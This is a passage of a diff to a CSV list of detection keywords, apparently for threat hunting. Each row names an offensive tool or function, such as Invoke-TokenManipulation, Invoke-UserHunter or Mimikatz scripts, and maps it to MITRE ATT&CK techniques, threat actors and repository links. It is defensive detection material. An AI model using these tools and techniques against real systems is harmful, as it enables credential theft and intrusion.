T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","HTTP-Login.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Thunderfox*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-TheKatz*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-ThirdPartyDriversCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-ThreadedFunction*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","HTTP-Login.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Thunderfox*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*Invoke-TmpDavFS*","offensive_tool_keyword","Invoke-TmpDavFS","Memory Backed Powershell WebDav Server - Creates a memory backed webdav server using powershell that can be mounted as a filesystem. Note: Mounting the remote filesystem on windows implies local caching of accessed files in the C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV system directory.","T1020 - T1059 - T1573 - T1210","TA0002 - TA0011 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/p3nt4/Invoke-TmpDavFS","1","0","N/A","N/A","2","132","27","2021-03-07T19:07:39Z","2018-07-01T13:21:11Z" "*Invoke-TokenManipulation*","offensive_tool_keyword","AD exploitation cheat sheet","Invoke-TokenManipulation script Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Invoke-TokenManipulation*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Invoke-TokenManipulation.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Tokenvator*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-TokenManipulation*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-TokenManipulation.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Tokenvator*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*Invoke-UacCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-UacCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-UdpEndpointsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UacCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UdpEndpointsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-UnattendFilesCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-UnattendFilesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-UpdateMimikatzScript.ps1*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","23","6","2023-03-02T22:59:52Z","2020-09-22T16:47:19Z" -"*Invoke-UrbanBishop*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*invoke-urlcheck -urls*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-UserCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-UserEnvCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-UserGroupsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UnattendFilesCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UpdateMimikatzScript.ps1*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","24","6","2023-03-02T22:59:52Z","2020-09-22T16:47:19Z" +"*Invoke-UrbanBishop*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*invoke-urlcheck -urls*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-UserCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UserEnvCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-UserGroupsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*invokeuserhunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-UserHunter*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" -"*Invoke-UserHunter*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-UserHunter*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-UserHunter*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-UserHunter*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*invoke-userhunter*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z" -"*Invoke-UserImpersonation*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-UsernameHarvestEAS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-UsernameHarvestGmail*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-UsernameHarvestOWA*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-UserImpersonation*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 